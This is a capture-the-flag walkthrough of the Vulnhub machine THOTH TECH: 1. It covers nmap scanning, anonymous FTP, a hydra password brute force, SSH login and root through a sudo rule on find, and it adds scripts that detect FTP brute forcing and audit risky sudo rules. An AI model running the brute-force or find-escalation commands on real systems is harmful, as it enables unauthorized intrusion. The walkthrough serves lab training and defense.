Vulnhub: THOTH TECH: 1
2021-08-24 22:02:27
1. Find the target:
The open ports in the subnet scan identify the target as 192.168.1.105.
┌──(kali㉿kali)-[~]
└─$ nmap 192.168.1.1/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-24 20:23 CST
Nmap scan report for 192.168.1.1
Host is up (0.0019s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
53/tcp filtered domain
80/tcp open http
1900/tcp open upnp
Nmap scan report for 192.168.1.104
Host is up (0.0070s latency).
All 1000 scanned ports on 192.168.1.104 are closed
Nmap scan report for 192.168.1.105
Host is up (0.00038s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Nmap scan report for 192.168.1.106
Host is up (0.00047s latency).
All 1000 scanned ports on 192.168.1.106 are closed
Nmap scan report for 192.168.1.108
Host is up (0.0057s latency).
All 1000 scanned ports on 192.168.1.108 are closed
Nmap scan report for 192.168.1.252
Host is up (0.0095s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
80/tcp open http
1900/tcp open upnp
Nmap done: 256 IP addresses (6 hosts up) scanned in 7.30 seconds
2. Scan and analyze the target
┌──(kali㉿kali)-[~]
└─$ nmap -sC -A 192.168.1.105
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-24 21:32 CST
Nmap scan report for 192.168.1.105
Host is up (0.00039s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 110 Jul 02 09:33 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.106
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ac:d2:7b:75:80:67:f2:9d:95:67:52:99:c8:2f:ab:7b (RSA)
| 256 78:ca:86:73:b6:87:06:08:eb:7a:9c:ab:cf:9d:89:16 (ECDSA)
| 256 93:49:d7:8c:1c:07:7e:8e:79:91:2b:bf:2d:0d:34:6b (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.40 seconds
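3. Examine the FTP service
The service scan shows that the FTP service allows anonymous login and that it holds a file named note.txt.
Log in to the FTP server, then download and read the file.
The note reveals that there is an FTP user named pwnlab and that its password is weak.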
┌──(kali㉿kali)-[~]
└─$ ftp 192.168.1.105
Connected to 192.168.1.105.
220 (vsFTPd 3.0.3)
Name (192.168.1.105:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 65534 65534 4096 Jul 02 09:33 .
drwxr-xr-x 2 65534 65534 4096 Jul 02 09:33 ..
-rw-r--r-- 1 0 0 110 Jul 02 09:33 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (110 bytes).
226 Transfer complete.
110 bytes received in 0.00 secs (2.9140 MB/s)
ftp> exit
221 Goodbye.
┌──(kali㉿kali)-[~]
└─$ cat note.txt
Dear pwnlab,
My name is jake. Your password is very weak and easily crackable, I think change your password.
4. Password brute force
Use hydra to crack the login password of the user pwnlab.
The result: the password of user pwnlab is babygirl1.
┌──(kali㉿kali)-[~]
└─$ hydra -l pwnlab -P /usr/share/wordlists/rockyou.txt 192.168.1.105 ftp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations,
or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-24 21:47:33
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.1.105:21/
[21][ftp] host: 192.168.1.105 login: pwnlab password: babygirl1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-08-24 21:48:31
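An added detection example, not part of the original walkthrough: password guessing like the run above shows up in the FTP server's log as a burst of FAIL LOGIN entries for one user from one client, ending in an OK LOGIN once the password is found. The shell function below counts failures per client and user and reports the pairs that reach a threshold; the log lines are constructed samples and assume vsftpd's native log format, and the function names, the user jake as an FTP account and the address 192.168.1.50 are assumptions made for the example.

```shell
#!/bin/sh
# Added example: flag FTP password guessing in a vsftpd log.

# Constructed sample log (assumed vsftpd native format; not taken from the target).
sample_vsftpd_log() {
    cat <<'EOF'
Tue Aug 24 13:47:34 2021 [pid 2101] CONNECT: Client "::ffff:192.168.1.106"
Tue Aug 24 13:47:36 2021 [pid 2100] [pwnlab] FAIL LOGIN: Client "::ffff:192.168.1.106"
Tue Aug 24 13:47:36 2021 [pid 2102] [pwnlab] FAIL LOGIN: Client "::ffff:192.168.1.106"
Tue Aug 24 13:47:37 2021 [pid 2104] [pwnlab] FAIL LOGIN: Client "::ffff:192.168.1.106"
Tue Aug 24 13:47:39 2021 [pid 2106] [pwnlab] FAIL LOGIN: Client "::ffff:192.168.1.106"
Tue Aug 24 13:47:40 2021 [pid 2108] [pwnlab] FAIL LOGIN: Client "::ffff:192.168.1.106"
Tue Aug 24 13:48:30 2021 [pid 2150] [pwnlab] OK LOGIN: Client "::ffff:192.168.1.106"
Tue Aug 24 14:02:11 2021 [pid 2200] [jake] FAIL LOGIN: Client "::ffff:192.168.1.50"
Tue Aug 24 14:02:20 2021 [pid 2202] [jake] OK LOGIN: Client "::ffff:192.168.1.50"
EOF
}

# detect_ftp_bruteforce THRESHOLD: reads log lines on stdin and prints
# "<client> <user> <failures> <verdict>" for every client/user pair with at
# least THRESHOLD failed logins. The verdict is SUCCESS_AFTER_FAILURES when a
# login succeeded after the threshold was reached, otherwise FAILURES_ONLY.
detect_ftp_bruteforce() {
    awk -v min="$1" '
        / (FAIL|OK) LOGIN: Client / {
            # Fields: date(5) [pid N] [user] FAIL|OK LOGIN: Client "addr"
            user   = substr($8, 2, length($8) - 2)      # strip [ ]
            client = substr($NF, 2, length($NF) - 2)    # strip quotes
            key = client " " user
            if ($9 == "FAIL") fails[key]++
            else if ((key in fails) && fails[key] >= min) hit[key] = 1
        }
        END {
            for (k in fails) if (fails[k] >= min)
                print k, fails[k], ((k in hit) ? "SUCCESS_AFTER_FAILURES" : "FAILURES_ONLY")
        }' | sort
}

# A single mistyped password (jake) stays below the threshold of 5.
sample_vsftpd_log | detect_ftp_bruteforce 5
```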
5. Log in to the server
Log in to the server over SSH as pwnlab.
┌──(kali㉿kali)-[~]
└─$ ssh pwnlab@192.168.1.105
pwnlab@192.168.1.105's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
Documentation: https://help.ubuntu.com
Management: https://landscape.canonical.com
Support: https://ubuntu.com/advantage
System information as of Tue 24 Aug 2021 01:49:55 PM UTC
System load: 0.0 Processes: 149
Usage of /: 25.0% of 19.56GB Users logged in: 0
Memory usage: 22% IPv4 address for enp0s3: 192.168.1.105
Swap usage: 0%
Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
66 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Aug 24 07:44:49 2021 from 192.168.1.106
pwnlab@thothtech:~$
pwnlab@thothtech:~$ whoami
pwnlab
6. Check the user's privileges and escalate
Running sudo -l shows that the user pwnlab may run the find program as root, which is then used to obtain root privileges.
pwnlab@thothtech:~$ sudo -l
Matching Defaults entries for pwnlab on thothtech:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pwnlab may run the following commands on thothtech:
(root) NOPASSWD: /usr/bin/find
pwnlab@thothtech:~$ sudo /usr/bin/find . -exec /bin/bash \; -quit
root@thothtech:/home/pwnlab# whoami
root
root@thothtech:/home/pwnlab#
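An added audit example, not part of the original walkthrough: the sudoers rule above is equivalent to full root because find can start other programs, and the same holds for many common utilities. The shell function below reads `sudo -l` output and reports rules that grant such a program or ALL; the function names, the short list of programs and the second sample rule are assumptions made for the example.

```shell
#!/bin/sh
# Added example: audit `sudo -l` output for rules that hand out a command runner.

# Programs that can start other programs through their own options
# (short, non-exhaustive list chosen for this example; find is the one on this page).
RISKY_BINARIES="find vi vim less more awk env perl python3 tar bash sh"

# Sample input: the rule from the walkthrough plus one constructed rule.
sample_sudo_l() {
    cat <<'EOF'
User pwnlab may run the following commands on thothtech:
    (root) NOPASSWD: /usr/bin/find
    (root) /usr/bin/id
EOF
}

# audit_sudo_rules: reads `sudo -l` output on stdin and prints
# "<runas> <NOPASSWD|PASSWD> <command>" for each rule granting a listed
# program or ALL.
audit_sudo_rules() {
    awk -v risky="$RISKY_BINARIES" '
        BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) bad[r[i]] = 1 }
        /^[ \t]*\(/ {                      # rule lines start with "(runas)"
            line = $0; sub(/^[ \t]*/, "", line)
            runas = line; sub(/\).*/, ")", runas)
            rest = line;  sub(/^\([^)]*\)[ \t]*/, "", rest)
            tag = "PASSWD"
            while (match(rest, /^[A-Z_]+:[ \t]*/)) {   # NOPASSWD:, SETENV:, ...
                if (substr(rest, 1, RLENGTH) ~ /^NOPASSWD/) tag = "NOPASSWD"
                rest = substr(rest, RLENGTH + 1)
            }
            m = split(rest, cmds, /,[ \t]*/)           # several commands per rule
            for (j = 1; j <= m; j++) {
                split(cmds[j], w, " ")                 # w[1] is the program path
                k = split(w[1], parts, "/")            # parts[k] is its basename
                if (w[1] == "ALL" || (parts[k] in bad)) print runas, tag, w[1]
            }
        }'
}

sample_sudo_l | audit_sudo_rules
```

A rule reported here is better removed or replaced with a root-owned wrapper script that runs one fixed command line.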
7. Get the final flag.
root@thothtech:/home/pwnlab# cd /root
root@thothtech:~# ls
root.txt snap
root@thothtech:~# cat root.txt
Root flag: d51546d5bcf8e3856c7bff5d201f0df6
good job 😃
root@thothtech:~#